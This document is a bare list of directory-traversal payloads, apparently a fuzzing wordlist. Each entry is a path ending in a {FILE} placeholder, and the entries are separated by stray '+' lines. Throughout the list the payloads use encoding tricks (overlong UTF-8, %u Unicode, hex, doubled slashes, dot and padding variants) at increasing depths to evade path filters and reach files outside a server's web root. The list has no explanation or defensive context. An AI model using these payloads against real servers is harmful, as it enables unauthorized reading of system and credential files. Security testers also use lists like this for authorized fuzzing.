AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\{FILE}
 +
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\..\..\..\..\..\..\..\..\{FILE}
 +
.../{FILE}
 +
.../.../{FILE}
 +
.../.../.../{FILE}
 +
.../.../.../.../{FILE}
 +
.../.../.../.../.../{FILE}
 +
.../.../.../.../.../.../{FILE}
 +
.../.../.../.../.../.../.../{FILE}
 +
.../.../.../.../.../.../.../.../{FILE}
 +
...\{FILE}
 +
...\...\{FILE}
 +
...\...\...\{FILE}
 +
...\...\...\...\{FILE}
 +
...\...\...\...\...\{FILE}
 +
...\...\...\...\...\...\{FILE}
 +
...\...\...\...\...\...\...\{FILE}
 +
...\...\...\...\...\...\...\...\{FILE}
 +
..../{FILE}
 +
..../..../{FILE}
 +
..../..../..../{FILE}
 +
..../..../..../..../{FILE}
 +
..../..../..../..../..../{FILE}
 +
..../..../..../..../..../..../{FILE}
 +
..../..../..../..../..../..../..../{FILE}
 +
..../..../..../..../..../..../..../..../{FILE}
 +
....\{FILE}
 +
....\....\{FILE}
 +
....\....\....\{FILE}
 +
....\....\....\....\{FILE}
 +
....\....\....\....\....\{FILE}
 +
....\....\....\....\....\....\{FILE}
 +
....\....\....\....\....\....\....\{FILE}
 +
....\....\....\....\....\....\....\....\{FILE}
 +
........................................................................../{FILE}
 +
........................................................................../../{FILE}
 +
........................................................................../../../{FILE}
 +
........................................................................../../../../{FILE}
 +
........................................................................../../../../../{FILE}
 +
........................................................................../../../../../../{FILE}
 +
........................................................................../../../../../../../{FILE}
 +
........................................................................../../../../../../../../{FILE}
 +
..........................................................................\{FILE}
 +
..........................................................................\..\{FILE}
 +
..........................................................................\..\..\{FILE}
 +
..........................................................................\..\..\..\{FILE}
 +
..........................................................................\..\..\..\..\{FILE}
 +
..........................................................................\..\..\..\..\..\{FILE}
 +
..........................................................................\..\..\..\..\..\..\{FILE}
 +
..........................................................................\..\..\..\..\..\..\..\{FILE}
 +
..%u2215{FILE}
 +
..%u2215..%u2215{FILE}
 +
..%u2215..%u2215..%u2215{FILE}
 +
..%u2215..%u2215..%u2215..%u2215{FILE}
 +
..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}
 +
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}
 +
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}
 +
..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215..%u2215{FILE}
 +
%uff0e%uff0e/{FILE}
 +
%uff0e%uff0e/%uff0e%uff0e/{FILE}
 +
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}
 +
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}
 +
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}
 +
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}
 +
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}
 +
%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/%uff0e%uff0e/{FILE}
 +
%uff0e%uff0e%u2215{FILE}
 +
%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}
 +
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}
 +
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}
 +
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}
 +
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}
 +
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}
 +
%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215%uff0e%uff0e%u2215{FILE}
 +
..%u2216{FILE}
 +
..%u2216..%u2216{FILE}
 +
..%u2216..%u2216..%u2216{FILE}
 +
..%u2216..%u2216..%u2216..%u2216{FILE}
 +
..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}
 +
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}
 +
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}
 +
..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216..%u2216{FILE}
 +
..%uEFC8{FILE}
 +
..%uEFC8..%uEFC8{FILE}
 +
..%uEFC8..%uEFC8..%uEFC8{FILE}
 +
..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}
 +
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}
 +
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}
 +
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}
 +
..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8..%uEFC8{FILE}
 +
..%uF025{FILE}
 +
..%uF025..%uF025{FILE}
 +
..%uF025..%uF025..%uF025{FILE}
 +
..%uF025..%uF025..%uF025..%uF025{FILE}
 +
..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}
 +
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}
 +
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}
 +
..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025..%uF025{FILE}
 +
%uff0e%uff0e\{FILE}
 +
%uff0e%uff0e\%uff0e%uff0e\{FILE}
 +
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}
 +
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}
 +
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}
 +
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}
 +
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}
 +
%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\%uff0e%uff0e\{FILE}
 +
%uff0e%uff0e%u2216{FILE}
 +
%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}
 +
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}
 +
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}
 +
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}
 +
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}
 +
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}
 +
%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216%uff0e%uff0e%u2216{FILE}
 +
..0x2f{FILE}
 +
..0x2f..0x2f{FILE}
 +
..0x2f..0x2f..0x2f{FILE}
 +
..0x2f..0x2f..0x2f..0x2f{FILE}
 +
..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}
 +
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}
 +
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}
 +
..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f..0x2f{FILE}
 +
0x2e0x2e/{FILE}
 +
0x2e0x2e/0x2e0x2e/{FILE}
 +
0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}
 +
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}
 +
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}
 +
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}
 +
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}
 +
0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/0x2e0x2e/{FILE}
 +
0x2e0x2e0x2f{FILE}
 +
0x2e0x2e0x2f0x2e0x2e0x2f{FILE}
 +
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}
 +
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}
 +
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}
 +
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}
 +
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}
 +
0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f0x2e0x2e0x2f{FILE}
 +
..0x5c{FILE}
 +
..0x5c..0x5c{FILE}
 +
..0x5c..0x5c..0x5c{FILE}
 +
..0x5c..0x5c..0x5c..0x5c{FILE}
 +
..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}
 +
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}
 +
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}
 +
..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c{FILE}
 +
0x2e0x2e\{FILE}
 +
0x2e0x2e\0x2e0x2e\{FILE}
 +
0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}
 +
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}
 +
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}
 +
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}
 +
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}
 +
0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\0x2e0x2e\{FILE}
 +
0x2e0x2e0x5c{FILE}
 +
0x2e0x2e0x5c0x2e0x2e0x5c{FILE}
 +
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}
 +
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}
 +
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}
 +
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}
 +
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}
 +
0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c0x2e0x2e0x5c{FILE}
 +
..%c0%2f{FILE}
 +
..%c0%2f..%c0%2f{FILE}
 +
..%c0%2f..%c0%2f..%c0%2f{FILE}
 +
..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}
 +
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}
 +
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}
 +
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}
 +
..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f..%c0%2f{FILE}
 +
%c0%2e%c0%2e/{FILE}
 +
%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}
 +
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}
 +
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}
 +
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}
 +
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}
 +
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}
 +
%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/%c0%2e%c0%2e/{FILE}
 +
%c0%2e%c0%2e%c0%2f{FILE}
 +
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
 +
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
 +
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
 +
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
 +
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
 +
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
 +
%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f%c0%2e%c0%2e%c0%2f{FILE}
 +
..%c0%5c{FILE}
 +
..%c0%5c..%c0%5c{FILE}
 +
..%c0%5c..%c0%5c..%c0%5c{FILE}
 +
..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}
 +
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}
 +
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}
 +
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}
 +
..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c..%c0%5c{FILE}
 +
%c0%2e%c0%2e\{FILE}
 +
%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
 +
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
 +
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
 +
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
 +
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
 +
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
 +
%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\%c0%2e%c0%2e\{FILE}
 +
%c0%2e%c0%2e%c0%5c{FILE}
 +
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
 +
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
 +
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
 +
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
 +
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
 +
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
 +
%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c%c0%2e%c0%2e%c0%5c{FILE}
 +
///%2e%2e%2f{FILE}
 +
///%2e%2e%2f%2e%2e%2f{FILE}
 +
///%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
///%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}
 +
\\\%2e%2e%5c{FILE}
 +
\\\%2e%2e%5c%2e%2e%5c{FILE}
 +
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
\\\%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}
 +
..//{FILE}
 +
..//..//{FILE}
 +
..//..//..//{FILE}
 +
..//..//..//..//{FILE}
 +
..//..//..//..//..//{FILE}
 +
..//..//..//..//..//..//{FILE}
 +
..//..//..//..//..//..//..//{FILE}
 +
..//..//..//..//..//..//..//..//{FILE}
 +
..///{FILE}
 +
..///..///{FILE}
 +
..///..///..///{FILE}
 +
..///..///..///..///{FILE}
 +
..///..///..///..///..///{FILE}
 +
..///..///..///..///..///..///{FILE}
 +
..///..///..///..///..///..///..///{FILE}
 +
..///..///..///..///..///..///..///..///{FILE}
 +
..\\{FILE}
 +
..\\..\\{FILE}
 +
..\\..\\..\\{FILE}
 +
..\\..\\..\\..\\{FILE}
 +
..\\..\\..\\..\\..\\{FILE}
 +
..\\..\\..\\..\\..\\..\\{FILE}
 +
..\\..\\..\\..\\..\\..\\..\\{FILE}
 +
..\\..\\..\\..\\..\\..\\..\\..\\{FILE}
 +
..\\\{FILE}
 +
..\\\..\\\{FILE}
 +
..\\\..\\\..\\\{FILE}
 +
..\\\..\\\..\\\..\\\{FILE}
 +
..\\\..\\\..\\\..\\\..\\\{FILE}
 +
..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
 +
..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
 +
..\\\..\\\..\\\..\\\..\\\..\\\..\\\..\\\{FILE}
 +
./\/./{FILE}
 +
./\/././\/./{FILE}
 +
./\/././\/././\/./{FILE}
 +
./\/././\/././\/././\/./{FILE}
 +
./\/././\/././\/././\/././\/./{FILE}
 +
./\/././\/././\/././\/././\/././\/./{FILE}
 +
./\/././\/././\/././\/././\/././\/././\/./{FILE}
 +
./\/././\/././\/././\/././\/././\/././\/././\/./{FILE}
 +
.\/\.\{FILE}
 +
.\/\.\.\/\.\{FILE}
 +
.\/\.\.\/\.\.\/\.\{FILE}
 +
.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
 +
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
 +
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
 +
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
 +
.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\{FILE}
 +
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../{FILE}
 +
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../{FILE}
 +
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../{FILE}
 +
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../{FILE}
 +
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../{FILE}
 +
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../{FILE}
 +
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../{FILE}
 +
././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././../../../../../../../../{FILE}
 +
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\{FILE}
 +
.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\..\..\{FILE}
 +
